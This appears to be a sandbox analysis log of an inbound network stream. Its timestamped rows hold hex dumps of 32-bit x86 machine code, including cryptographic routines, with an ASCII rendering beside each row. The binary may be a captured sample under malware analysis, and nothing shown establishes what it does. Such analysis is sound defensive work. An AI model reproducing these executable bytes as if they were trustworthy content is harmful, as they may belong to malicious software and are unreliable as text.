2023-10-05 16:48:06 UTC	500	IN	Data Raw: c6 08 83 c7 07 90 90 90 90 90 90 90 90 90 90 90 90 8b 6f f9 8b 57 fd 0f cd 31 cd 0f ca 31 c2 89 e8 c1 e8 04 31 d0 25 0f 0f 0f 0f 89 c1 c1 e1 04 31 e9 31 d0 89 cb c1 eb 10 0f b7 d0 31 da 89 d5 c1 e5 10 31 cd 31 c2 89 d1 c1 e9 02 31 e9 81 e1 33 33 33 33 8d 1c 8d 00 00 00 00 31 d3 31 e9 89 d8 c1 e8 08 31 c8 25 ff 00 ff 00 89 c5 c1 e5 08 31 dd 31 c8 89 c2 d1 ea 31 ea 81 e2 55 55 55 55 8d 0c 12 31 c1 31 ea 0f ac c1 01 d1 ca 6a 01 6a 00 ff 74 24 10 e8 97 0b 00 00 83 c4 0c 89 c1 6a ff 6a 0f ff 74 24 0c e8 85 0b 00 00 83 c4 0c 89 c1 6a 01 6a 00 ff 74 24 08 e8 73 0b 00 00 83 c4 0c d1 c0 d1 c2 89 c1 d1 e9 31 d1 81 e1 55 55 55 55 8d 2c 09 31 c5 31 d1 89 c8 c1 e8 08 31 e8 25 ff 00 ff 00 89 c2 c1 e2 08 31 ca 31 e8 89 d1 c1 e9 02 31 c1 81 e1 33 33 33 33 8d 2c 8d 00 00 Data Ascii: oW111%1111113333111%111UUUU11jjt$jjt$jjt$s1UUUU,111%1113333,
2023-10-05 16:48:06 UTC	508	IN	Data Raw: 00 08 00 00 0f b6 c8 03 9c 8f 00 0c 00 00 31 d3 33 9f 40 10 00 00 89 d9 c1 e9 18 89 da c1 ea 0e 81 e2 fc 03 00 00 8b 94 17 00 04 00 00 03 14 8f 0f b6 cf 33 94 8f 00 08 00 00 0f b6 cb 03 94 8f 00 0c 00 00 31 c2 33 97 3c 10 00 00 89 d0 c1 e8 18 89 d1 c1 e9 0e 81 e1 fc 03 00 00 8b 8c 0f 00 04 00 00 03 0c 87 0f b6 c6 33 8c 87 00 08 00 00 0f b6 c2 03 8c 87 00 0c 00 00 31 d9 33 8f 38 10 00 00 89 c8 c1 e8 18 89 ce c1 ee 0e 81 e6 fc 03 00 00 8b 9c 37 00 04 00 00 03 1c 87 0f b6 c5 33 9c 87 00 08 00 00 0f b6 c1 03 9c 87 00 0c 00 00 31 d3 33 9f 34 10 00 00 89 d8 c1 e8 18 89 da c1 ea 0e 81 e2 fc 03 00 00 8b 94 17 00 04 00 00 03 14 87 0f b6 c7 33 94 87 00 08 00 00 0f b6 c3 03 94 87 00 0c 00 00 31 ca 33 97 30 10 00 00 89 d0 c1 e8 18 89 d1 c1 e9 0e 81 e1 fc 03 00 00 8b Data Ascii: 13@313<3138731343130
2023-10-05 16:48:06 UTC	516	IN	Data Raw: c4 04 c7 85 e8 01 00 00 00 00 00 00 ff b5 64 01 00 00 e8 ea 7e fb ff 83 c4 04 c7 85 64 01 00 00 00 00 00 00 ff b5 68 01 00 00 e8 d2 7e fb ff 83 c4 04 c7 85 68 01 00 00 00 00 00 00 55 e8 8f be fd ff 83 c4 04 8b 45 68 8b 48 08 83 c1 fd 83 f9 01 0f 87 c0 00 00 00 8d b5 d8 02 00 00 c7 85 d8 02 00 00 00 00 00 00 c7 85 dc 02 00 00 00 00 00 00 8d 8d ec 01 00 00 89 4c 24 20 8b 40 0c 8b 40 14 89 44 24 1c 8b 85 24 01 00 00 8d 8d f4 02 00 00 8b 50 04 8d 7c 24 1c 51 57 ff 70 0c 52 ff 52 28 83 c4 10 89 85 f0 02 00 00 85 c0 74 26 8b 85 24 01 00 00 8b 48 04 56 ff 70 0c 51 ff 51 30 83 c4 0c 85 c0 0f 84 c1 02 00 00 68 78 68 4e 00 e9 48 fb ff ff c6 85 40 01 00 00 01 80 bd 61 02 00 00 00 74 14 8b 85 24 01 00 00 8b 48 04 83 c0 0c 50 51 ff 51 20 83 c4 08 68 e1 07 4f 00 e8 3f Data Ascii: d~dh~hUEhHL$ @@D$$P\|$QWpRR(t&$HVpQQ0hxhNH@at$HPQQ hO?
2023-10-05 16:48:06 UTC	524	IN	Data Raw: 50 56 e8 7a 5e fe ff 83 c4 08 89 c7 8b 45 10 8d 04 c5 ff ff ff ff 6a 00 50 56 e8 f2 5e fe ff 83 c4 0c ff 75 14 56 e8 96 73 fe ff 83 c4 08 31 db 85 c0 75 0f 57 56 ff 75 18 e8 b3 fc 00 00 83 c4 0c 89 c3 56 e8 98 56 fe ff 83 c4 04 89 d8 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 83 ec 0c 89 ce 8a 5c 24 20 8b 7c 24 1c a1 34 00 50 00 31 e0 89 44 24 08 89 e0 8d 4c 24 04 50 51 52 e8 27 05 01 00 83 c4 0c 83 7f 10 01 77 17 68 41 02 00 00 68 78 49 4f 00 68 1c 71 4f 00 e8 dd a0 02 00 83 c4 0c 84 db 75 0e ff 77 10 ff 76 08 e8 78 51 fb ff 83 c4 08 31 c0 83 7f 10 01 74 36 31 db 90 90 90 90 90 90 90 90 90 90 90 53 ff 74 24 04 e8 b6 56 fe ff 83 c4 08 0f b6 c0 50 ff 76 08 e8 97 50 fb ff 83 c4 08 83 c3 01 8b 47 10 83 c0 ff 39 c3 72 d7 50 ff 74 24 04 Data Ascii: PVz^EjPV^uVs1uWVuVV^_[]SWV\$ \|$4P1D$L$PQR'whAhxIOhqOuwvxQ1t61St$VPvPG9rPt$
2023-10-05 16:48:06 UTC	532	IN	Data Raw: 90 0f b7 1c 51 89 1c 97 83 c2 01 39 d0 75 f2 8b 4c 24 2c 83 f9 02 0f 82 5c 01 00 00 89 ca 8b 04 24 89 6c 24 0c eb 5d 90 90 90 90 90 90 90 90 90 90 6a 00 6a 01 ff 76 08 6a 04 55 ff 76 10 e8 5e 3a fb ff 83 c4 18 89 46 10 8b 4e 08 8d 51 01 89 56 08 c7 04 88 00 00 00 00 8b 46 04 83 c0 01 31 d2 f7 36 89 56 04 8b 4c 24 08 8b 44 24 04 8b 04 98 89 04 8f 83 c1 01 89 ca 89 f8 83 f9 01 0f 86 f7 00 00 00 8b 7c 24 04 89 44 24 04 31 db 31 c9 89 3c 24 89 54 24 10 eb 26 90 90 90 90 90 90 90 90 89 f8 8b 6c 24 0c 8b 3c 24 8b 4c 24 08 89 04 8f 83 c1 01 83 c3 02 8b 54 24 10 39 d3 73 b8 89 d8 83 c8 01 39 d0 89 4c 24 08 0f 84 61 ff ff ff 89 e9 8b 54 24 04 8b 2c 9a 8b 3c 82 0f af fd 83 c5 02 6a 00 6a 01 ff 76 08 6a 04 51 ff 76 10 e8 ad 39 fb ff 83 c4 18 89 46 10 0f b7 cd 8b 56 Data Ascii: Q9uL$,\$l$]jjvjUv^:FNQVF16VL$D$\|$D$11<$T$&l$<$L$T$9s9L$aT$,<jjvjQv9FV
2023-10-05 16:48:06 UTC	539	IN	Data Raw: 6a 04 ff 73 04 e8 f7 12 fb ff 83 c4 08 ff 73 04 68 ef 11 00 00 68 f9 02 00 00 ff 74 24 70 e8 7e f1 ff ff 83 c4 10 8b 03 57 53 ff 50 0c 83 c4 08 8b 03 53 ff 50 10 83 c4 04 6a 20 57 ff 76 04 e8 3d 12 fb ff 83 c4 0c 8b 06 57 56 ff 50 0c 83 c4 08 8b 06 56 ff 50 10 83 c4 04 8b 44 24 28 8b 54 24 08 89 42 1c 8b 44 24 24 89 42 18 8b 44 24 20 89 42 14 8b 44 24 1c 89 42 10 8b 44 24 18 89 42 0c 8b 44 24 14 89 42 08 8b 44 24 0c 8b 4c 24 10 89 4a 04 89 02 6a 40 57 e8 d4 e5 fd ff 83 c4 08 8b 4c 24 4c 31 e1 e8 96 6a 01 00 83 c4 50 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 50 89 d3 89 4c 24 08 a1 34 00 50 00 31 e0 89 44 24 4c 8b 35 68 86 4d 00 68 68 86 4d 00 ff d6 83 c4 04 89 c7 85 c0 74 09 8b 07 57 ff 50 04 83 c4 04 0f b6 c3 50 89 7c 24 Data Ascii: jsshht$p~WSPSPj Wv=WVPVPD$(T$BD$$BD$ BD$BD$BD$BD$L$Jj@WL$L1jP^_[]USWVPL$4P1D$L5hMhhMtWPP\|$
2023-10-05 16:48:06 UTC	547	IN	Data Raw: 24 08 56 ff 75 fc e8 c6 20 fe ff 83 c4 08 89 44 24 04 57 50 e8 88 18 fe ff 83 c4 08 89 c5 8b 44 24 3c ff 70 f0 55 ff 74 24 08 e8 c2 30 fe ff 83 c4 0c 89 c7 55 e8 e7 f8 fd ff 83 c4 04 ff 74 24 04 e8 db f8 fd ff 83 c4 04 ff 34 24 e8 d0 f8 fd ff 83 c4 04 ff 74 24 0c e8 c4 f8 fd ff 83 c4 04 ff 74 24 08 e8 b8 f8 fd ff 83 c4 04 68 60 f7 4d 00 ff 73 08 e8 d8 f4 fa ff 83 c4 08 6a 28 ff 73 08 e8 eb f3 fa ff 83 c4 08 bd 13 00 00 00 90 90 90 55 56 e8 39 f9 fd ff 83 c4 08 0f b6 c0 50 ff 73 08 e8 1a f3 fa ff 83 c4 08 83 c5 ff 72 e2 bd 13 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 55 57 e8 09 f9 fd ff 83 c4 08 0f b6 c0 50 ff 73 08 e8 ea f2 fa ff 83 c4 08 83 c5 ff 72 e2 56 e8 3c f8 fd ff 83 c4 04 57 e8 33 f8 fd ff 83 c4 04 8b 4c 24 24 31 e1 e8 05 4b 01 00 83 c4 28 Data Ascii: $Vu D$WPD$<pUt$0Ut$4$t$t$h`Msj(sUV9PsrUWPsrV<W3L$$1K(
2023-10-05 16:48:06 UTC	555	IN	Data Raw: 83 c4 10 56 e8 c8 dc fa ff 83 c4 04 ff 74 24 1c e8 ac e2 fa ff 83 c4 04 8b 8c 24 38 01 00 00 31 e9 e8 9b 2c 01 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 68 91 69 4e 00 6a 06 57 e8 24 d2 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 14 d2 fd ff 83 c4 0c f6 44 24 04 01 0f 85 b1 fe ff ff 68 76 69 4e 00 6a 06 57 e8 f9 d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 e9 d1 fd ff 83 c4 0c f6 44 24 18 01 0f 85 91 fe ff ff 68 5c 69 4e 00 6a 06 57 e8 ce d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 be d1 fd ff 83 c4 0c f6 44 24 14 01 0f 85 71 fe ff ff 68 43 69 4e 00 6a 06 57 e8 a3 d1 fd ff 83 c4 0c 68 6f 1d 4e 00 6a 07 57 e8 93 d1 fd ff 83 c4 0c f6 44 24 10 01 0f 84 4d fe ff ff e9 68 fe ff ff 6a 07 68 5d 17 4e 00 ff 74 24 0c e8 10 d3 fa ff 83 c4 0c 8b 75 08 8d 5c 24 38 e9 02 fb ff Data Ascii: Vt$$81,e^_[]hiNjW$hoNjWD$hviNjWhoNjWD$h\iNjWhoNjWD$qhCiNjWhoNjWD$Mhjh]Nt$u\$8
2023-10-05 16:48:06 UTC	563	IN	Data Raw: ba 02 00 00 00 6a 02 50 e8 a4 01 00 00 83 c4 08 8d 84 24 80 0a 00 00 8d 8c 24 80 06 00 00 ba 02 00 00 00 6a 02 50 e8 86 01 00 00 83 c4 08 8d 84 24 00 0b 00 00 8d 8c 24 00 07 00 00 ba 02 00 00 00 6a 02 50 e8 68 01 00 00 83 c4 08 8d 84 24 80 0b 00 00 8d 8c 24 80 07 00 00 ba 02 00 00 00 6a 02 50 e8 4a 01 00 00 83 c4 08 89 e3 89 d9 ba 10 00 00 00 6a 10 57 e8 36 01 00 00 83 c4 08 8d 84 24 10 04 00 00 8d 4c 24 10 ba 10 00 00 00 6a 10 50 e8 1b 01 00 00 83 c4 08 8d 84 24 20 04 00 00 8d 4c 24 20 ba 10 00 00 00 6a 10 50 e8 00 01 00 00 83 c4 08 8d 84 24 30 04 00 00 8d 4c 24 30 ba 10 00 00 00 6a 10 50 e8 e5 00 00 00 83 c4 08 8d 84 24 40 04 00 00 8d 4c 24 40 ba 10 00 00 00 6a 10 50 e8 ca 00 00 00 83 c4 08 8d 84 24 50 04 00 00 8d 4c 24 50 ba 10 00 00 00 6a 10 50 e8 af Data Ascii: jP$$jP$$jPh$$jPJjW6$L$jP$ L$ jP$0L$0jP$@L$@jP$PL$PjP
2023-10-05 16:48:06 UTC	571	IN	Data Raw: 83 c4 0c eb 56 56 ff 15 40 d9 4f 00 ff 15 f8 d9 4f 00 50 e8 c9 d9 fa ff 83 c4 04 50 68 36 12 4e 00 eb 30 57 ff 74 24 08 ff 15 80 db 4f 00 85 c0 74 0b ff 34 24 ff 15 c0 da 4f 00 eb 29 56 ff 15 40 d9 4f 00 ff 34 24 ff 15 c0 da 4f 00 55 68 bd f3 4d 00 e8 29 93 fa ff 83 c4 08 8b 4c 24 24 89 01 be ff ff ff ff 8b 4c 24 08 31 e1 e8 d0 ed 00 00 89 f0 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 56 83 ec 08 8b 74 24 14 8b 44 24 10 8b 0d 34 00 50 00 31 e1 89 4c 24 04 c7 04 24 00 00 00 00 89 e1 51 50 e8 38 fe ff ff 83 c4 08 83 f8 ff 74 15 6a 01 56 6a 00 6a 00 6a 00 50 50 e8 50 06 00 00 83 c4 1c eb 0c ff 34 24 56 e8 f2 13 00 00 83 c4 08 89 c6 8b 4c 24 04 31 e1 e8 62 ed 00 00 89 f0 83 c4 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 8b 5c 24 24 8b 7c 24 Data Ascii: VV@OOPPh6N0Wt$Ot4$O)V@O4$OUhM)L$$L$1^_[]Vt$D$4P1L$$QP8tjVjjjPPP4$VL$1b^USWV\$$\|$
2023-10-05 16:48:06 UTC	578	IN	Data Raw: cc 68 ae 00 00 00 ff 74 24 0c e8 52 67 fa ff 83 c4 08 8b 00 80 38 00 74 0d 50 ff 74 24 08 e8 7e ab 00 00 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc 57 56 8b 7c 24 0c 6a 00 6a 28 6a 01 e8 3f 7e fa ff 83 c4 0c 89 c6 89 38 8d 78 20 c7 40 20 08 86 4d 00 c7 40 24 00 00 00 00 c6 40 1d 00 83 c0 04 50 e8 9a d5 fa ff 83 c4 04 c7 46 18 00 00 00 00 c6 46 1c 01 89 f8 5e 5f c3 cc cc cc cc cc cc cc 57 56 8b 74 24 0c 81 3e 08 86 4d 00 74 17 68 be 00 00 00 68 38 50 4f 00 68 52 19 4f 00 e8 21 c6 01 00 83 c4 0c 8b 46 f8 85 c0 74 09 50 e8 ae 6d fe ff 83 c4 04 8d 7e e0 83 c6 e4 56 e8 8f d5 fa ff 83 c4 04 57 e8 46 7e fa ff 83 c4 04 5e 5f c3 55 53 57 56 8b 6c 24 20 8b 44 24 1c 8b 7c 24 14 81 3f 08 86 4d 00 74 1b 68 ca 00 00 00 68 38 50 4f 00 68 52 19 4f 00 89 c6 e8 c5 c5 01 00 Data Ascii: ht$Rg8tPt$~WV\|$jj(j?~8x @ M@$@PFF^_WVt$>Mthh8POhRO!FtPm~VWF~^_USWVl$ D$\|$?Mthh8POhRO
2023-10-05 16:48:06 UTC	586	IN	Data Raw: c4 08 89 c6 8b 44 24 28 50 53 55 e8 d1 fb ff ff 83 c4 0c 89 44 24 0c 56 ff 33 ff 75 00 e8 0f 5e fd ff 83 c4 0c 56 ff 73 04 ff 75 04 e8 00 5e fd ff 83 c4 0c 55 e8 87 fd ff ff 83 c4 04 89 44 24 04 ff 75 00 e8 98 5c fd ff 83 c4 04 ff 75 04 e8 8d 5c fd ff 83 c4 04 6a 0c 55 e8 92 2a fd ff 83 c4 08 55 e8 69 5f fa ff 83 c4 04 ff 33 e8 6f 5c fd ff 83 c4 04 ff 73 04 e8 64 5c fd ff 83 c4 04 6a 0c 53 e8 69 2a fd ff 83 c4 08 53 e8 40 5f fa ff 83 c4 04 89 74 24 08 56 8b 6c 24 10 ff 75 00 8b 5c 24 0c ff 33 e8 86 5d fd ff 83 c4 0c 56 ff 75 04 ff 73 04 e8 77 5d fd ff 83 c4 0c 8b 03 89 de 57 8b 5c 24 2c ff 33 50 50 e8 f2 5c fd ff 83 c4 10 8b 46 04 57 ff 73 04 50 50 e8 e1 5c fd ff 83 c4 10 8b 45 00 57 8b 5c 24 04 ff 33 50 50 e8 cd 5c fd ff 83 c4 10 8b 45 04 57 ff 73 04 50 Data Ascii: D$(PSUD$V3u^Vsu^UD$u\u\jUUi_3o\sd\jSiS@_t$Vl$u\$3]Vusw]W\$,3PP\FWsPP\EW\$3PP\EWsP
2023-10-05 16:48:06 UTC	594	IN	Data Raw: 75 ef 8d 44 24 10 68 f0 00 00 00 50 e8 a0 0b fd ff 83 c4 08 85 ff 74 76 8b 4c 24 04 83 e1 fe 8b 3c 24 89 f8 c1 e0 04 8b 9c 24 18 01 00 00 8d 14 18 81 c2 5c ff ff ff f7 df 8d ab 1c fe ff ff 31 c0 eb 20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 7f 42 f0 83 c0 02 83 c2 e0 83 c5 20 39 c1 74 2d 8d 1c 07 66 0f 6f 45 f0 85 c0 74 0a 83 fb 06 74 05 66 0f 38 db c0 66 0f 7f 02 66 0f 6f 45 00 83 fb 05 74 ca 66 0f 38 db c0 eb c3 31 c0 f6 44 24 04 01 74 33 81 44 24 08 fc fe ff ff 8b 14 24 83 c2 06 29 c2 89 c1 c1 e1 04 66 0f 6f 04 0e 85 c0 74 09 85 d2 74 05 66 0f 38 db c0 c1 e2 04 8b 44 24 08 66 0f 7f 04 10 8b 8c 24 00 01 00 00 31 e1 e8 a9 8f 00 00 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 0c 85 c0 0f 8e 92 00 00 00 8b 4c Data Ascii: uD$hPtvL$<$$\1 fB 9t-foEttf8ffoEtf81D$t3D$$)fottf8D$f$1^_[]D$L
2023-10-05 16:48:06 UTC	602	IN	Data Raw: 00 8d 04 a8 89 44 24 38 89 c8 25 33 f3 ff ff 89 cd c1 ed 02 81 e5 33 33 00 00 8d 04 85 00 00 00 00 01 e8 89 44 24 24 33 5c 24 10 89 dd 81 e5 33 f3 ff ff 89 df c1 ef 02 81 e7 33 33 00 00 8d 04 af 89 44 24 3c 8b 44 24 04 33 44 24 30 89 c5 89 44 24 04 81 e5 33 f3 ff ff c1 e8 02 25 33 33 00 00 8d 04 a8 89 44 24 44 8b 04 24 25 33 f3 ff ff c1 ee 02 81 e6 33 33 00 00 8d 04 86 89 04 24 8b 74 24 50 8b 44 24 0c 33 44 24 28 8b 7c 24 08 33 7c 24 20 33 7c 24 1c 89 7c 24 08 8b 6c 24 38 31 6c 24 14 33 4c 24 10 33 4c 24 3c 89 cf 33 5c 24 30 33 5c 24 44 8b 4c 24 04 33 4c 24 2c 33 0c 24 89 4c 24 04 8b 4c 24 4c 8b 6c 24 18 33 6c 24 34 33 54 24 24 66 33 06 89 44 24 0c 66 33 6e 02 8b 44 24 08 66 33 46 04 89 44 24 10 8b 44 24 14 66 33 46 06 89 44 24 14 66 33 56 08 89 54 24 1c Data Ascii: D$8%333D$$3\$333D$<D$3D$0D$3%33D$D$%333$t$PD$3D$(\|$3\|$ 3\|$\|$l$81l$3L$3L$<3\$03\$DL$3L$,3$L$L$Ll$3l$43T$$f3D$f3nD$f3FD$D$f3FD$f3VT$
2023-10-05 16:48:06 UTC	610	IN	Data Raw: f8 89 5c 24 10 89 6c 24 08 eb 27 90 90 90 90 90 90 89 f1 89 f2 50 e8 b6 d8 ff ff 83 c4 04 8b 45 00 83 c0 10 89 45 00 83 c6 10 39 de 0f 83 f3 00 00 00 39 e8 75 db 8b 47 c8 8b 4f cc 89 0c 24 89 c2 0f ca 89 57 e4 89 ca 0f ca 89 57 e0 8b 57 d0 89 d3 0f cb 89 5f dc 8b 4f d4 89 cb 66 c1 c3 08 66 89 5f da 89 cb c1 eb 10 88 5f d9 89 cb 89 4c 24 14 0f cb 83 c0 01 8b 2c 24 83 d5 00 83 d2 00 89 5f d8 0f 92 04 24 89 cb 83 d3 00 88 47 f7 88 67 f6 89 c1 c1 e9 10 88 4f f5 89 c1 c1 e9 18 88 4f f4 89 e9 88 4f f3 88 6f f2 c1 e9 10 88 4f f1 89 e9 c1 e9 18 88 4f f0 88 57 ef 88 77 ee 89 d1 c1 e9 10 88 4f ed 89 d1 c1 e9 18 88 4f ec 88 5f eb 88 7f ea 89 d9 c1 e9 10 88 4f e9 c1 eb 18 88 5f e8 8b 5c 24 10 83 c0 01 89 47 c8 83 d5 00 89 6f cc 83 d2 00 89 57 d0 0f b6 04 24 13 44 24 Data Ascii: \$l$'PEE99uGO$WWW_Off__L$,$_$GgOOOoOOWwOO_O_\$GoW$D$
2023-10-05 16:48:06 UTC	618	IN	Data Raw: 18 c7 40 04 67 e6 09 6a c7 80 c4 00 00 00 00 00 00 00 c7 80 c8 00 00 00 00 00 00 00 c7 80 cc 00 00 00 00 00 00 00 c7 80 d0 00 00 00 00 00 00 00 c7 80 d4 00 00 00 00 00 00 00 89 d0 5e 5f 5b c3 cc 56 8b 44 24 08 8b 70 14 83 fe 41 72 14 6a 78 68 94 5c 4f 00 68 9e 23 4f 00 e8 25 2a 01 00 83 c4 0c 6a 00 68 f0 00 00 00 6a 01 e8 d1 e1 f9 ff 83 c4 0c 8d 88 e4 00 00 00 c7 80 e4 00 00 00 68 8e 4d 00 89 70 40 8d 90 d8 00 00 00 c7 80 d8 00 00 00 40 b3 49 00 c7 80 dc 00 00 00 00 00 00 00 89 90 e0 00 00 00 89 90 e8 00 00 00 89 c8 5e c3 cc 57 56 8b 44 24 0c 8d b8 1c ff ff ff b9 10 00 00 00 be 98 8e 4d 00 f3 a5 b9 08 c9 bd f2 33 88 5c ff ff ff 89 88 1c ff ff ff c7 80 20 ff ff ff 67 e6 09 6a c7 40 e0 00 00 00 00 c7 40 e4 00 00 00 00 c7 40 e8 00 00 00 00 c7 40 ec 00 00 00 Data Ascii: @gj^_[VD$pArjxh\Oh#O%*jhjhMp@@I^WVD$M3\ gj@@@@
2023-10-05 16:48:06 UTC	625	IN	Data Raw: 1e 89 ca 0f a4 c2 19 31 fb 31 da 89 c7 0f a4 c8 19 31 f0 89 fe 23 74 24 0c 0b 7c 24 0c 23 7c 24 10 09 f7 89 7c 24 44 89 ce 23 74 24 08 89 cb 0b 5c 24 08 23 5c 24 14 09 f3 8b 74 24 38 03 74 24 2c 8b 7c 24 1c 13 7c 24 04 01 d3 8b 4c 24 44 11 c1 03 5c 24 2c 13 4c 24 04 89 4c 24 44 89 f0 0f a4 f8 12 89 f1 0f a4 f9 0e 31 c1 89 f8 0f a4 f0 12 89 fa 0f a4 f2 0e 31 c2 89 f0 89 74 24 38 0f a4 f8 17 89 7c 24 1c 31 d0 89 44 24 04 0f a4 f7 17 31 cf 89 7c 24 4c 8b 74 24 18 8b 54 24 28 31 d6 8b 7c 24 40 8b 4c 24 30 31 cf 23 74 24 1c 23 7c 24 38 31 d6 31 cf 8b 4c 24 48 8b 84 cc d0 00 00 00 03 04 cd d0 92 4d 00 8b 94 cc d4 00 00 00 13 14 cd d4 92 4d 00 03 44 24 20 13 54 24 24 01 f8 11 f2 03 44 24 04 89 44 24 24 13 54 24 4c 89 54 24 20 89 d8 89 d9 8b 7c 24 44 0f a4 f9 04 Data Ascii: 111#t$\|$#\|$\|$D#t$\$#\$t$8t$,\|$\|$L$D\$,L$L$D11t$8\|$1D$1\|$Lt$T$(1\|$@L$01#t$#\|$811L$HMMD$ T$$D$D$$T$LT$ \|$D
2023-10-05 16:48:06 UTC	633	IN	Data Raw: 0c 39 50 00 eb 06 8b 3d 0c 39 50 00 8b 4d e4 6a 07 58 89 4d fc 39 45 f4 7c 30 33 c9 53 0f a2 8b f3 5b 90 8d 5d dc 89 03 89 73 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d 0c 39 50 00 eb 03 8b 5d f0 a1 40 01 50 00 83 c8 02 c7 05 08 39 50 00 01 00 00 00 a3 40 01 50 00 f7 c1 00 00 10 00 0f 84 93 00 00 00 83 c8 04 c7 05 08 39 50 00 02 00 00 00 a3 40 01 50 00 f7 c1 00 00 00 08 74 79 f7 c1 00 00 00 10 74 71 33 c9 0f 01 d0 89 45 ec 89 55 f0 8b 45 ec 8b 4d f0 6a 06 5e 23 c6 3b c6 75 57 a1 40 01 50 00 83 c8 08 c7 05 08 39 50 00 03 00 00 00 a3 40 01 50 00 f6 c3 20 74 3b 83 c8 20 c7 05 08 39 50 00 05 00 00 00 a3 40 01 50 00 b8 00 00 03 d0 23 d8 3b d8 75 1e 8b 45 ec ba e0 00 00 00 8b 4d f0 23 c2 3b c2 75 0d 83 0d 40 01 50 00 40 89 35 Data Ascii: 9P=9PMjXM9E\|03S[]sKMS]t=9P]@P9P@P9P@Ptytq3EUEMj^#;uW@P9P@P t; 9P@P#;uEM#;u@P@5
2023-10-05 16:48:06 UTC	641	IN	Data Raw: 00 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8b 44 24 0c 5e 5f c3 8d 49 00 8a 46 03 88 47 03 8a 46 02 88 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 f7 c7 0f 00 00 00 74 0f 49 4e 4f 8a 06 88 07 f7 c7 0f 00 00 00 75 f1 81 f9 80 00 00 00 72 68 81 ee 80 00 00 00 81 ef 80 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 6f 56 20 f3 0f 6f 5e 30 f3 0f 6f 66 40 f3 0f 6f 6e 50 f3 0f 6f 76 60 f3 0f 6f 7e 70 f3 0f 7f 07 f3 0f 7f 4f 10 f3 0f 7f 57 20 f3 0f 7f 5f 30 f3 0f 7f 67 40 f3 0f 7f 6f 50 f3 0f 7f 77 60 f3 0f 7f 7f 70 81 e9 80 00 00 00 f7 c1 80 ff ff ff 75 90 83 f9 20 72 23 83 ee 20 83 ef 20 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 83 e9 20 f7 c1 e0 ff ff ff 75 dd f7 c1 fc ff ff ff 74 15 83 ef Data Ascii: D$^_FGD$^_IFGFGD$^_FGFGFGD$^_tINOurhooNoV o^0of@onPov`o~pOW _0g@oPw`pu r# ooNO ut
2023-10-05 16:48:06 UTC	649	IN	Data Raw: c0 eb 44 ff 76 28 e8 ad ef ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 be 8b 46 14 99 89 07 89 57 04 eb 15 8b 46 14 89 07 eb 0e 66 8b 46 14 66 89 07 eb 05 8a 46 14 88 07 c6 46 2c 01 b0 01 5f 5e c3 8b ff 55 8b ec 8b 4d 08 8d 41 e0 66 83 f8 5a 77 0f 8d 41 e0 83 e0 7f 8a 04 45 69 96 4d 00 eb 02 32 c0 0f b6 c8 0f b6 45 0c 8d 04 c8 83 e0 7f 8a 04 45 68 96 4d 00 5d c2 08 00 8b ff 55 8b ec 81 ec 64 04 00 00 a1 34 00 50 00 33 c5 89 45 fc 53 56 8b f1 57 8b 06 8b 7e 04 8b 18 53 e8 12 21 01 00 88 85 9c fb ff ff 8b 06 59 8d 8d a4 fb ff ff 8b 00 89 85 a0 fb ff ff 8b 46 10 ff 30 8b 46 0c ff 76 04 ff 30 8b 46 08 ff 70 04 ff 30 8d 85 a0 fb ff ff 50 e8 20 f2 ff ff 83 65 f4 00 8d 8d a4 fb ff ff e8 bb f3 ff ff 8d 8d e0 fb ff ff 8b f0 e8 e3 ed ff ff Data Ascii: Dv(Yt+tHtuFWFfFfFF,_^UMAfZwAEiM2EEhM]Ud4P3ESVW~S!YF0Fv0Fp0P e
2023-10-05 16:48:06 UTC	657	IN	Data Raw: 01 8b 46 10 74 06 0f bf 40 fc eb 04 0f b7 40 fc 99 89 55 fc eb 1e 8b 4e 1c 8b c1 83 46 10 04 c1 e8 04 a8 01 8b 46 10 74 06 0f be 40 fc eb 04 0f b6 40 fc 99 8b f8 8b c1 c1 e8 04 a8 01 74 16 3b d3 7f 12 7c 04 3b fb 73 0c f7 df 13 d3 f7 da 83 c9 40 89 4e 1c 83 7e 24 00 89 55 fc 7d 09 c7 46 24 01 00 00 00 eb 17 ff 76 08 83 e1 f7 ff 76 24 89 4e 1c 8d 4e 3c e8 23 f6 ff ff 8b 55 fc 8b c7 0b c2 75 04 83 66 1c df 83 7d f8 08 8b ce ff 75 08 88 5e 38 75 09 52 57 e8 56 10 00 00 eb 06 57 e8 ea 10 00 00 8b 46 1c c1 e8 07 a8 01 74 19 39 5e 34 74 08 8b 46 30 80 38 30 74 0c ff 4e 30 8b 4e 30 c6 01 30 ff 46 34 b0 01 5f 5e 5b c9 c2 04 00 8b ff 55 8b ec 51 51 53 56 8b f1 57 ff 76 28 e8 93 cf ff ff 59 8b c8 89 45 f8 6a 00 5f 83 e9 01 0f 84 9c 00 00 00 83 e9 01 74 74 49 83 e9 Data Ascii: Ft@@UNFFt@@t;\|;s@N~$U}F$vv$NN<#Uuf}u^8uRWVWFt9^4tF080tN0N00F4_^[UQQSVWv(YEj_ttI
